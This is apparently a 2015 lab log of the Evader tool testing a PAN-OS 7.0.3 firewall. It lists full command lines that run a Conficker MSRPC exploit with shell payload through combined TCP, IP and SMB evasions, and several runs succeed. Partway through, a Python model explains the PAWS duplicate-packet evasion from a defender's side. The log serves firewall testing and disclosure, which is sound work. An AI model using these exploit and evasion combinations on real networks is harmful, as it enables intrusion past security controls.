- Palo Alto Networks (PAN-OS 7.0.3) Evader log, December 2015
- Run after applying the best practices recommended by Palo Alto Networks here:
- https://www.paloaltonetworks.com/documentation/70/pan-os/pan-os/threat-prevention/best-practices-for-securing-your-network-from-layer-4-and-layer-7-evasions.html
- Firewall configured with the strictest security profiles possible (IPS, AV, ...)
- PA (firewall) IP is 10.62.90.3
- Victim IP: 10.35.1.207
- Attacker (Evader) IPs: 10.62.90.110-120
- begin Log File
- Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.110 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=10 --min_evasions=2 --max_evasions=3 --passthrough --verifydelay=1000"
- 2015-11-29 14:25:48 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
- 2015-11-29 14:25:48 INFO Victim check disabled - will NOT notice if victim is no longer running
- 2015-11-29 14:25:50 INFO Using rand seed cMvMFqDfRtA=
- 2015-11-29 14:25:50 WARN evader is already running ; this may cause VICTIM CHECK FAILED messages!
- 2015-11-29 14:25:50 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
- Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
- 0 runs averaging 0.00 runs / second ; progress: 1/43200.........................
- 25 runs averaging 4.00 runs / second ; progress: 6/43200.......2015-11-29 14:25:58 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52333 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=h1rO1S4WuZU --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435455","zero" --evasion=[smb_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed h1rO1S4WuZW
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.117:52333 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
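The tcp_paws evasion the run above describes (every 2nd segment duplicated with TSval = normal - 268435455 and a 0x00 payload) works because the victim's TCP stack discards the stale duplicate under PAWS, while an inspection device that reassembles the stream without checking the timestamps option may keep the junk copy and lose sight of the exploit. The following is an added Python model of that mismatch; it is not code from Evader, mongbat or Palo Alto Networks. Assumptions not stated in the log: the junk duplicate is put on the wire before the genuine segment, TS.Recent after the handshake is 1000, and the chunk bytes are constructed stand-ins for the SMB/MSRPC messages.

```python
"""Model of the tcp_paws insertion evasion (added example, not Evader code).
A duplicate of a data segment is sent with junk payload and a TSval far in
the past. A receiver implementing PAWS (RFC 7323 section 5) discards it; a
middlebox that reassembles without checking timestamps may reassemble the junk."""
from dataclasses import dataclass

MASK32 = 0xFFFFFFFF


def ts_older(a, b):
    """True if 32-bit timestamp a precedes b under wrap-safe serial arithmetic."""
    return ((a - b) & MASK32) > 0x7FFFFFFF


@dataclass(frozen=True)
class Segment:
    seq: int        # sequence number of the first payload byte
    tsval: int      # TSval from the TCP timestamps option
    payload: bytes


def build_evasion_stream(chunks, start_seq, start_ts, every_n, ts_delta, filler=b"\x00"):
    """Emit data segments the way the log's 'tcp_paws,N,DELTA,zero' line reads:
    every N-th segment is preceded by a duplicate with TSval = normal - DELTA and
    a same-length filler payload. Assumption (not stated in the log): the junk
    duplicate is sent before the genuine segment."""
    segs, seq, ts = [], start_seq, start_ts
    for i, chunk in enumerate(chunks, 1):
        ts += 1                                   # sender clock ticks once per segment
        if i % every_n == 0:
            junk = (filler * len(chunk))[:len(chunk)]
            segs.append(Segment(seq, (ts - ts_delta) & MASK32, junk))
        segs.append(Segment(seq, ts, chunk))
        seq += len(chunk)
    return segs


def endpoint_reassemble(segments, ts_recent):
    """Receiver enforcing PAWS. ts_recent is TS.Recent as learned from the
    handshake; a segment whose TSval is older than it is dropped before any
    of its bytes reach the application."""
    rcv_nxt, data = None, bytearray()
    for s in segments:
        if ts_older(s.tsval, ts_recent):
            continue                              # PAWS reject: stale timestamp
        if rcv_nxt is None:
            rcv_nxt = s.seq
        if s.seq == rcv_nxt:                      # in-order data: accept it
            data += s.payload
            rcv_nxt += len(s.payload)
            ts_recent = s.tsval                   # TS.Recent advances with in-order data
        # seq < rcv_nxt is a retransmission of bytes already delivered: ignored.
        # Out-of-order queuing is outside this model.
    return bytes(data)


def naive_reassemble(segments, favour="first"):
    """Middlebox that ignores timestamps and keeps the first or the last copy
    of each sequence number it sees. Each policy is wrong for some ordering."""
    seen = {}
    for s in segments:
        if favour == "first" and s.seq in seen:
            continue
        seen[s.seq] = s.payload
    return b"".join(seen[k] for k in sorted(seen))


def demo():
    """Constructed stand-in for the SMB/MSRPC bytes; PAWS parameters from the run above."""
    chunks = [b"SMB-NEGOTIATE", b"SMB-TREE-CONNECT", b"MSRPC-BIND", b"MSRPC-REQ"]
    handshake_ts = 1000                           # assumed TS.Recent after the handshake
    stream = build_evasion_stream(chunks, 1, handshake_ts, every_n=2, ts_delta=268435455)
    return {
        "host": endpoint_reassemble(stream, handshake_ts),
        "naive_first": naive_reassemble(stream, "first"),
        "naive_last": naive_reassemble(stream, "last"),
    }


if __name__ == "__main__":
    for name, stream in demo().items():
        print(f"{name:12s} {stream!r}")
```

Running it shows the host receiving the intact SMB/MSRPC stream while the first-copy-wins reassembler sees zero bytes where the tree connect and the MSRPC request should be. A last-copy-wins reassembler happens to be right for this ordering, but would be wrong if the duplicate followed the genuine segment; only comparing each TSval against TS.Recent the way the endpoint does is correct for both orderings, which is why an inline device must model the victim's PAWS behaviour instead of picking a copy heuristically.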
- ...........
- 44 runs averaging 3.90 runs / second ; progress: 11/43200...............
- 59 runs averaging 3.62 runs / second ; progress: 16/43200...............2015-11-29 14:26:10 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33234 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=cC4uchCIvqM --evasion=[msrpc_bind,end]tcp_paws,"25%","5","random_alphanum" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"3","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed cC4uchCIvqN
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Add a random alphanumeric urgent data byte to every 3 TCP segment.
- The following evasions are applied from stage msrpc_bind to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.119:33234 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .2015-11-29 14:26:10 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59537 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=ePCbpjJvBgk --evasion=[start,end]tcp_inittsopt,"enable","normal" --evasion=[start,end]tcp_paws,"3","191194982","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed ePCbpjJvBgl
- - TCP timestamps enabled, initial TCP timestamp is set to zero.
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 191194982> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.116:59537 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ............
- 89 runs averaging 4.17 runs / second ; progress: 21/43200..............................
- 119 runs averaging 4.51 runs / second ; progress: 26/43200..........................
- 145 runs averaging 4.61 runs / second ; progress: 31/43200....2015-11-29 14:26:23 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34345 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=GmSliZQobbI --evasion=[netbios_connect,smb_opentree]ipv4_frag,"80" --evasion=[netbios_connect,smb_opentree]ipv4_order,"lastfirst" --evasion=[smb_opentree,end]tcp_paws,"75%","5","random" --verifydelay=1000 --payload=shell
- Info: Using random seed GmSliZQobbI
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - IPv4 fragments with at most 80 bytes per fragment
- - IPv4 fragments are sent in correct order except that the last fragment comes first
- The following evasions are applied from stage smb_opentree to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:34345 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...............
- 165 runs averaging 4.52 runs / second ; progress: 36/43200...................
- 184 runs averaging 4.43 runs / second ; progress: 42/43200.....................
- 205 runs averaging 4.41 runs / second ; progress: 47/43200.......................
- 228 runs averaging 4.42 runs / second ; progress: 52/43200.2015-11-29 14:26:43 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61332 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=MTOzOSDi8Jw --evasion=[start,end]ipv4_opt,"8","inc","shuffletcp" --evasion=[smb_connect,msrpc_bind]smb_chaff,"21","write_flag","rand" --evasion=[msrpc_bind,end]tcp_paws,"1","268435455","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed MTOzOSDi8Jw
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.114:61332 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ................
- 246 runs averaging 4.35 runs / second ; progress: 57/43200.........
- 255 runs averaging 4.14 runs / second ; progress: 62/43200.
- 256 runs averaging 3.84 runs / second ; progress: 67/432002015-11-29 14:26:58 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29527 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=GOvj/FZON2U --evasion=[smb_connect,smb_opentree]smb_decoytrees,"7","5","7","random" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","268435454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed GOvj/FZON2U
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Before normal SMB writes, 7 SMB trees are opened and 5 writes are performed to them. The write payload is 7 random bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.119:29527 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........
- 268 runs averaging 3.74 runs / second ; progress: 72/43200..................
- 286 runs averaging 3.73 runs / second ; progress: 77/43200........2015-11-29 14:27:10 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22237 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=qVWS+7bkAvY --evasion=[smb_connect,smb_opentree]ipv4_opt,"75%","inc","random" --evasion=[smb_openpipe,end]tcp_paws,"75%","9","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed qVWS+7bkAva
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.114:22237 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 301 runs averaging 3.68 runs / second ; progress: 82/43200.......
- 308 runs averaging 3.55 runs / second ; progress: 87/43200.......
- 315 runs averaging 3.43 runs / second ; progress: 92/43200.........
- 324 runs averaging 3.35 runs / second ; progress: 97/43200.........2015-11-29 14:27:31 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33045 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=6Pjh3NY8nJk --evasion=[smb_connect,msrpc_bind]ipv4_frag,"1472" --evasion=[msrpc_bind,end]tcp_paws,"75%","4","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 6Pjh3NY8nJn
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage msrpc_bind to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.119:33045 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 335 runs averaging 3.29 runs / second ; progress: 102/43200.
- 336 runs averaging 3.15 runs / second ; progress: 107/43200....
- 340 runs averaging 3.04 runs / second ; progress: 112/43200....
- 344 runs averaging 2.94 runs / second ; progress: 117/43200.....
- 349 runs averaging 2.86 runs / second ; progress: 122/43200..
- 351 runs averaging 2.77 runs / second ; progress: 127/43200...
- 354 runs averaging 2.68 runs / second ; progress: 132/43200
- 354 runs averaging 2.59 runs / second ; progress: 137/43200.....
- 359 runs averaging 2.53 runs / second ; progress: 142/43200.......
- 366 runs averaging 2.49 runs / second ; progress: 147/43200....
- 370 runs averaging 2.44 runs / second ; progress: 152/43200.....
- 375 runs averaging 2.39 runs / second ; progress: 157/43200..
- 377 runs averaging 2.33 runs / second ; progress: 162/43200.....
- 382 runs averaging 2.29 runs / second ; progress: 167/43200......
- 388 runs averaging 2.26 runs / second ; progress: 172/432002015-11-29 14:28:43 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63628 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=nbC99GjwshU --evasion=[msrpc_bind,msrpc_req]smb_seg,"6" --evasion=[smb_openpipe,end]smb_writeandxpad,"1023","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed nbC99GjwshW
- The following evasions are applied from stage smb_openpipe to end:
- - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - SMB writes are segmented to contain at most 6 bytes of payload.
- Info: NetBIOS connection 10.62.90.113:63628 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 390 runs averaging 2.20 runs / second ; progress: 177/43200
- 390 runs averaging 2.14 runs / second ; progress: 182/43200
- 390 runs averaging 2.09 runs / second ; progress: 187/43200
- 390 runs averaging 2.03 runs / second ; progress: 192/43200
- 390 runs averaging 1.98 runs / second ; progress: 197/43200
- 390 runs averaging 1.93 runs / second ; progress: 202/43200
- 390 runs averaging 1.88 runs / second ; progress: 207/43200
- 390 runs averaging 1.84 runs / second ; progress: 212/43200
- 390 runs averaging 1.80 runs / second ; progress: 217/43200
- 390 runs averaging 1.76 runs / second ; progress: 222/43200
- 390 runs averaging 1.72 runs / second ; progress: 227/43200
- 390 runs averaging 1.68 runs / second ; progress: 232/43200
- 390 runs averaging 1.64 runs / second ; progress: 237/43200
- 390 runs averaging 1.61 runs / second ; progress: 242/43200
- 390 runs averaging 1.58 runs / second ; progress: 247/43200
- 390 runs averaging 1.55 runs / second ; progress: 252/43200
- 390 runs averaging 1.52 runs / second ; progress: 257/43200
- 390 runs averaging 1.49 runs / second ; progress: 262/43200
- 390 runs averaging 1.46 runs / second ; progress: 267/43200
- 390 runs averaging 1.43 runs / second ; progress: 272/43200
- 390 runs averaging 1.41 runs / second ; progress: 277/43200
- 390 runs averaging 1.38 runs / second ; progress: 282/43200
- 390 runs averaging 1.36 runs / second ; progress: 287/43200
- 390 runs averaging 1.33 runs / second ; progress: 292/43200
- 390 runs averaging 1.31 runs / second ; progress: 297/43200
- 390 runs averaging 1.29 runs / second ; progress: 302/43200
- 390 runs averaging 1.27 runs / second ; progress: 307/43200Pid 8487 timed out - killed
- 2015-11-29 14:31:01 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45741 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=LSFebZF03gA --evasion=[smb_opentree,end]smb_decoytrees,"6","2","3","random_alphanum" --evasion=[msrpc_bind,end]tcp_urgent,"8","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed LSFebZF03gA
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 6 SMB trees are opened and 2 writes are performed to them. The write payload is 3 random alphanumeric bytes.
- The following evasions are applied from stage msrpc_bind to end:
- - Add a random alphaurgent data byte to every 8 TCP segment.
- Info: NetBIOS connection 10.62.90.117:45741 -> 10.35.1.207:445
- Terminated
- 391 runs averaging 1.25 runs / second ; progress: 312/43200
- 391 runs averaging 1.23 runs / second ; progress: 317/43200Pid 8714 timed out - killed
- 2015-11-29 14:31:09 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26549 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Q4MPR/Ipdco --evasion=[smb_openpipe,msrpc_req]tcp_segvar,"8","38910" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Q4MPR/Ipdcp
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP packets are segmented to contain between 8 and 38910 bytes of payload.
- Info: NetBIOS connection 10.62.90.115:26549 -> 10.35.1.207:445
- Terminated
- 392 runs averaging 1.22 runs / second ; progress: 322/43200...
- 395 runs averaging 1.21 runs / second ; progress: 327/43200.2015-11-29 14:31:20 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61076 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=ks72eUXp6pg --evasion=[start,netbios_connect]ipv4_frag,"40" --evasion=[smb_openpipe,end]tcp_paws,"1","10","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed ks72eUXp6pi
- The following evasions are applied from stage start to netbios_connect:
- - IPv4 fragments with at most 40 bytes per fragment
- The following evasions are applied from stage smb_openpipe to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.117:61076 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 397 runs averaging 1.19 runs / second ; progress: 332/43200.........
- 406 runs averaging 1.20 runs / second ; progress: 337/43200........
- 414 runs averaging 1.21 runs / second ; progress: 342/43200.Pid 9734 timed out - killed
- 2015-11-29 14:31:33 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55680 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=gb9TlKpcDKQ --evasion=[netbios_connect,smb_opentree]netbios_chaff,"21","empty_unspec|small_unspec|http_post|msrpc_req" --evasion=[netbios_connect,end]tcp_recv_window,"130051" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
- Info: Using random seed gb9TlKpcDKS
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 130051 bytes.
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Before every 21th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:55680 -> 10.35.1.207:445
- Terminated
- .............
- 429 runs averaging 1.23 runs / second ; progress: 347/43200Pid 9930 timed out - killed
- 2015-11-29 14:31:38 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52808 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=e5vVqTJ0DxU --evasion=[start,smb_openpipe]ipv4_frag,"1480" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed e5vVqTJ0DxV
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 1480 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.118:52808 -> 10.35.1.207:445
- Terminated
- ...2015-11-29 14:31:40 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=27985 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=g2MlQoI2/qU --evasion=[smb_connect,end]tcp_paws,"5","6","alphanumrandomized" --evasion=[msrpc_req,end]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed g2MlQoI2/qW
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.115:27985 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 436 runs averaging 1.24 runs / second ; progress: 353/43200
- 436 runs averaging 1.22 runs / second ; progress: 358/43200Pid 10305 timed out - killed
- 2015-11-29 14:31:51 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18240 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=lvOqSj7TLSw --evasion=[smb_connect,msrpc_req]ipv4_frag,"1480" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"8","268435454","random" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed lvOqSj7TLSy
- The following evasions are applied from stage smb_connect to msrpc_req:
- - IPv4 fragments with at most 1480 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:18240 -> 10.35.1.207:445
- Terminated
- ....
- 441 runs averaging 1.22 runs / second ; progress: 363/43200.........
- 450 runs averaging 1.22 runs / second ; progress: 368/43200...2015-11-29 14:32:00 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11394 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=zKgv1BqIzcM --evasion=[smb_opentree,msrpc_req]netbios_chaff,"3","empty_unspec|empty_keepalive|broken_length" --evasion=[smb_connect,msrpc_req]smb_decoytrees,"5","5","2","random_msrpcbind" --evasion=[msrpc_bind,end]tcp_paws,"3","190383014","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed zKgv1BqIzcP
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before every 3th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 190383014> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.115:11394 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....
- 459 runs averaging 1.23 runs / second ; progress: 373/43200...2015-11-29 14:32:04 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60421 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=bHcAuyx6Oms --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case" --evasion=[smb_connect,msrpc_req]tcp_paws,"1","17330454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed bHcAuyx6Omt
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 17330454> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- Info: NetBIOS connection 10.62.90.117:60421 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......
